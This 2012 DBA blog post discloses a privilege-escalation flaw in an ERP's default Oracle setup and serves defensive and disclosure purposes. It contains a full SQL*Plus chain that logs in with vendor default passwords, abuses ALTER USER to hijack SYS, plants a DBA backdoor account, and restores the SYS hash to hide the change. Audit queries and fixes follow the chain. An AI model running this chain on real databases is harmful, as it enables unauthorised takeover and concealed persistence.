Friday, May 25, 2012

Most powerful system privilege on the Oracle database?

On occasion, I read 2600 Magazine (I used to have a subscription) and while I don't claim to understand every article, sometimes I come across a gem that pertains to my day-to-day life as an Oracle DBA/Developer. For example, the Fall 2006 issue had an Oracle article that I decided to give a try.

Sure enough, under the standard database configuration that comes with CDC Software's iRenaissance, I was able to expose a flaw in the user security. This system comes with two "master" users: fin_prod and man_prod (the finance and manufacturing users). Almost everyone knows the built-in passwords for these users, so logging on via SQL*Plus is not much trouble.

Once logged in, these two users hold a custom role defined by the ERP, GEM_DBA. This role carries the ALTER USER system privilege, and ALTER USER is not limited to your own account: it lets you change the password of any user in the database, including SYS (or SYSTEM). With a little more work, one can also:

  • Capture the existing SYS password hash as stored in the data dictionary (a hash, not a recoverable encrypted copy)
  • Change the sys password
  • Create a new user
  • Change the sys password back

At that point you have either created a backdoor user or simply gained SYSDBA access, and because the original hash has been put back, the SYS password looks untouched.
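Here is the sequence above written out as it would be typed in SQL*Plus, followed by the dictionary queries a DBA should run to see who actually holds ALTER USER. This is an added example, not code from the post or from the 2600 article. It assumes Oracle 10g, where DBA_USERS.PASSWORD still exposes the hash (on 11g and later that column is blank and the hash sits in SYS.USER$.SPARE4), that a password file is in place so SYS can connect AS SYSDBA, and that the ERP account can read DBA_USERS (via SELECT ANY DICTIONARY or SELECT_CATALOG_ROLE). The TNS alias PRODDB, the user svc_backup, every password, and the hash value are placeholders; only fin_prod and GEM_DBA come from the post.

```sql
-- Added example, not from the original post. Placeholders: PRODDB (TNS alias),
-- vendor_default (the well-known ERP password), svc_backup, all passwords, and
-- the hash value 0123456789ABCDEF (constructed, not a real hash).

-- 1. Log in as one of the ERP master accounts with its built-in password.
CONNECT fin_prod/vendor_default@PRODDB

-- Confirm the chain's premise: GEM_DBA carries ALTER USER and it is active
-- in this session. SESSION_PRIVS and ROLE_SYS_PRIVS are readable by any user.
SELECT privilege FROM role_sys_privs WHERE role = 'GEM_DBA' AND privilege = 'ALTER USER';
SELECT privilege FROM session_privs  WHERE privilege = 'ALTER USER';

-- 2. Capture the stored SYS hash so it can be restored later. This is the
--    "little more work": DBA_USERS needs SELECT ANY DICTIONARY or
--    SELECT_CATALOG_ROLE (assumed granted to the ERP account here).
--    10g: DBA_USERS.PASSWORD holds the hash.
--    11g+: that column is empty; read SYS.USER$.SPARE4 instead (needs SELECT
--    on SYS.USER$), and the value is restored with the 'S:...' form below.
SELECT password FROM dba_users WHERE username = 'SYS';
--   -> 0123456789ABCDEF   (placeholder)

-- 3. Overwrite the SYS password. Double quotes keep the case exact, which
--    matters on 11g where passwords are case sensitive.
ALTER USER sys IDENTIFIED BY "Temp_Pass_1";

-- 4. Reconnect as SYS. SYS may only connect AS SYSDBA (or SYSOPER);
--    a plain connect fails with ORA-28009.
CONNECT sys/Temp_Pass_1@PRODDB AS SYSDBA

-- 5. Create the backdoor account and hand it DBA.
CREATE USER svc_backup IDENTIFIED BY "Backup_Pass_1";
GRANT CREATE SESSION, DBA TO svc_backup;

-- 6. Put the original hash back so the SYS password appears unchanged.
ALTER USER sys IDENTIFIED BY VALUES '0123456789ABCDEF';
-- 11g+ equivalent:  ALTER USER sys IDENTIFIED BY VALUES 'S:<spare4 value>';

-- What to check on your own instance (run as a DBA): who holds ALTER USER
-- directly, which roles carry it, and who has been granted the ERP role.
SELECT grantee, admin_option FROM dba_sys_privs  WHERE privilege = 'ALTER USER';
SELECT role                  FROM role_sys_privs WHERE privilege = 'ALTER USER';
SELECT grantee, admin_option FROM dba_role_privs WHERE granted_role = 'GEM_DBA';
-- 11g+ only: accounts still sitting on a vendor or Oracle default password.
SELECT username FROM dba_users_with_defpwd;
```

The last four queries are the practical takeaway: any grantee that appears for ALTER USER, directly or through a role, can run the same chain, so the fix is to strip ALTER USER out of GEM_DBA (or grant it only with a password-protected, non-default role) and to change the fin_prod and man_prod passwords from the vendor defaults.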

I originally demonstrated the above and posted it to the Technology email list for the ERP vendor, as very few clients will ever modify these login passwords or the GEM_DBA role. Hopefully, someone at CDC addressed this in a later release.

For now, "alter user" is the name of my blog on all things Oracle I have encountered.